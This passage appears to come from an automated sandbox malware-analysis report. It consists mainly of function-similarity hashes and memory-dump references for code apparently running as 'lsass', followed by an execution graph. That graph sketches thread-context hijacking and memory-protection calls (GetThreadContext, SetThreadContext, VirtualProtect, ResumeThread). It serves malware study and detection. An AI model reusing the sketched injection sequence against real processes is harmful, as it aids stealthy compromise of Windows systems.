                                            • Instruction ID: aa166f6266bb96c49c0b0f95c8e07a40ccaf4e3586e99a536f9aed07c311213a
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 6A91B132618B5999FB608F65B4503ED2BB0FB55B98F4C9106DE4E67A8ADA34C4C7C3C0
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017D2DD928DF), ref: 0000017D2DD92A12
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 161731ed0ae2ef707c3846a923dcaaa592243d47a9ec6ea24c75e78032a4b9d3
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 2191D37261CF5899FB609F65A4507ED2FB0BB55B88F8C8106DE4E53A9ADA36C4C7C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 4157c9474ce7d2e752517023a27d0e78ade98282bef4b994be3812213f498eb2
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 2E113036754F088AEB00CF60F8543E833B4FB19758F880E21EA6D867A5DF78C1968380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 2aa209a757e4fbc714ef488a962a096078ee1508234afb1299f8c663f67ae909
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 26111836758F088AEB00CF60F8543E833B4FB19758F880E21DA6D867A9DB78C1958340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 22f2695277af76d670f0967431e5bfea649157ade2b1d551e0a59b770f421315
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 9371A436208F4552E7769F26A8543EA6BB4FB44B84F6C4016DD4DC3B86DA35CA87C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 3ac9d71f64e126eaf44fec6926ac91d70d8a3b8c0250537b7c388df9b0915fe2
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: D9518A32259F088AEB54CB15F448BA937B1EF54B98F198125EA4E4778FDB79D882C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 6277699836f2ef0ffb95fe119b8b3529a6a6aa0f2a0a27a23f57712dfb66d9c3
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: BB617972508BC886EB619B15F4447DAB7B0FB95B98F084215EB9C07B9BCB78D1D6CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 35267cd655bf9caf2e33435e48c99650ca7eaeacb93b2f1d621d557c5748305f
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: A451083620CF8A51E624DE25B4543EA6B71FB85B90F4C8025CD5D53B8BDEB9C48AC740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 23e35751b5abfab3b77e63a031846c12326ec51ae4d032a5ea77df319e333399
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 14511A3660CF8952E6668E27B8543EA6B71FB94780F6C8025CD4D83B4BDA35C887C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 72de2532ea490e7dffc4b3d9ad32238eb81dd84d989dfa065ece3d23a1744465
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 5741F532629F8886E710CF65F4447DAB7B0FB58784F884121EE4D87799EB78C482CB80
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 492664b8bfdbf055df8f1fa8c2a846768a128b9748a37560dfc5af203f170ba4
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: C541C37262DF8886E7109F65F4447DAB7B0FB48784F984121EE4D87759EB39C482CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 2b9d1bb40f4fa3f8fa971c5af465a33c2449e1adeffbe0ac49bef364339b357f
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 34111632218F8482EB218B25F444699B7F5FB88B94F584620EB8D07B69DF78C592CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 1cc6089273064e111180bd74b2486519d09c46a90e5625fb4184db58a00ffaf3
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 6E110732218B8482EB618F15F444299B7F5FB88B94F6C4621EACD47B65DF39C592CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 721abd91f3690e52f6e2d03652fbd8b305912301ab44bd746d91c8c08f8d5257
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: CC115B21A15F8886EA14CB66B80429977B0FB88FD0F5C4125DF4E53766EF78D4828380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 4da8378083cf3f74fbf4b6e13f4fd663bc3e5d3b278b433972dcbe017ac43df3
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 7B115B21A09F8885EA15CF66B80429977B0FB88FD0F6D4125DE4E93766EF39D4838300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 8be371d4c702924ae43c8205af8ae46fcb34ac841cdc9e9091f12d0e275119f0
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: 71E03931602A089AE7148B62F80838936F1EB88B05F488024CA0907351EF7D84DA87C0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 84452d5df85e26a687d517e9152bb4517ea1800da2cefb1fbab3fd001e8bdf5a
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: 53E06D31605B089AE7148F62E8083C936F1FF88F05F48C024CA0D07361EF7E84DA8740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: a3c236485addc4aadda2de53174d0080134f033a9d576b6ac258d18ee10dc9bc
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 77E0ED71611A089BE7189B62F80429976B1FF88B15F488064CA0907311EE3C84DA9690
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 448b2953cca01322ab99f4bea14cfa22d25d4f8b2947c58beb2b9094a6ce8700
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 38E0ED71615A089AE7189F62E8043D976B1FF88B15F488074CA0907321EE3984DA9610

                                            Execution Graph

                                            Execution Coverage:1.7%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:1393
                                            Total number of Limit Nodes:7
                                            execution_graph 8200 22f4b933960 8210 22f4b928ca0 8200->8210 8202 22f4b933988 8204 22f4b929324 __CxxCallCatchBlock 9 API calls 8205 22f4b933998 8204->8205 8206 22f4b929324 __CxxCallCatchBlock 9 API calls 8205->8206 8207 22f4b9339a1 8206->8207 8208 22f4b92c2f4 14 API calls 8207->8208 8209 22f4b9339aa 8208->8209 8212 22f4b928cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8210->8212 8211 22f4b928dd1 8211->8202 8211->8204 8212->8211 8213 22f4b928d94 RtlUnwindEx 8212->8213 8213->8212 8551 22f4b9306e0 8552 22f4b9306e9 8551->8552 8556 22f4b9306f9 8551->8556 8553 22f4b92d1f4 __std_exception_copy 13 API calls 8552->8553 8554 22f4b9306ee 8553->8554 8555 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8554->8555 8555->8556 8214 22f4b927f60 8215 22f4b927f81 8214->8215 8216 22f4b927f7c 8214->8216 8218 22f4b928090 8216->8218 8219 22f4b9280b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8218->8219 8220 22f4b928127 8218->8220 8219->8220 8220->8215 8800 22f4b93465f 8801 22f4b9346e2 8800->8801 8802 22f4b934677 8800->8802 8802->8801 8803 22f4b929324 __CxxCallCatchBlock 9 API calls 8802->8803 8804 22f4b9346c4 8803->8804 8805 22f4b929324 __CxxCallCatchBlock 9 API calls 8804->8805 8806 22f4b9346d9 8805->8806 8807 22f4b92c2f4 14 API calls 8806->8807 8807->8801 7562 22f4b9263e3 7563 22f4b9263f0 7562->7563 7564 22f4b9263fc GetThreadContext 7563->7564 7569 22f4b92655a 7563->7569 7565 22f4b926422 7564->7565 7564->7569 7565->7569 7572 22f4b926449 7565->7572 7566 22f4b926581 VirtualProtect FlushInstructionCache 7566->7569 7567 22f4b92663e 7568 22f4b92665e 7567->7568 7580 22f4b924b20 7567->7580 7584 22f4b925530 GetCurrentProcess 7568->7584 7569->7566 7569->7567 7570 22f4b9264cd 7572->7570 7575 22f4b9264a6 SetThreadContext 7572->7575 7574 22f4b926663 7576 22f4b926677 ResumeThread 7574->7576 7577 22f4b9266b7 7574->7577 7575->7570 7576->7574 7588 22f4b928070 7577->7588 7582 22f4b924b3c 7580->7582 7581 22f4b924b9f 7581->7568 7582->7581 7583 22f4b924b52 VirtualFree 7582->7583 7583->7582 7585 22f4b92554c 7584->7585 7586 22f4b925562 VirtualProtect FlushInstructionCache 7585->7586 7587 22f4b925593 7585->7587 7586->7585 7587->7574 7589 22f4b928079 7588->7589 7590 22f4b9266ff 7589->7590 7591 22f4b928848 IsProcessorFeaturePresent 7589->7591 7592 22f4b928860 7591->7592 7597 22f4b92891c RtlCaptureContext 7592->7597 7598 22f4b928936 RtlLookupFunctionEntry 7597->7598 7599 22f4b928873 7598->7599 7600 22f4b92894c RtlVirtualUnwind 7598->7600 7601 22f4b928814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7599->7601 7600->7598 7600->7599 7602 22f4b92f3e4 7603 22f4b92f41d 7602->7603 7605 22f4b92f3ee 7602->7605 7604 22f4b92f403 FreeLibrary 7604->7605 7605->7603 7605->7604 7606 22f4b9333e4 7607 22f4b9333f5 CloseHandle 7606->7607 7608 22f4b9333fb 7606->7608 7607->7608 7609 22f4b92b7ea 7621 22f4b92c2f4 7609->7621 7624 22f4b92cab0 7621->7624 7623 22f4b92c2fd 7632 22f4b92cb10 7624->7632 7626 22f4b92cab9 7627 22f4b92cabe 7626->7627 7628 22f4b92cae8 FlsGetValue 7626->7628 7630 22f4b92cae4 7626->7630 7627->7623 7628->7630 7629 22f4b92cafe 7629->7623 7630->7629 7641 22f4b92c940 GetLastError 7630->7641 7633 22f4b92cb59 GetLastError 7632->7633 7637 22f4b92cb2f __std_exception_copy 7632->7637 7634 22f4b92cb6c 7633->7634 7636 22f4b92cb8a 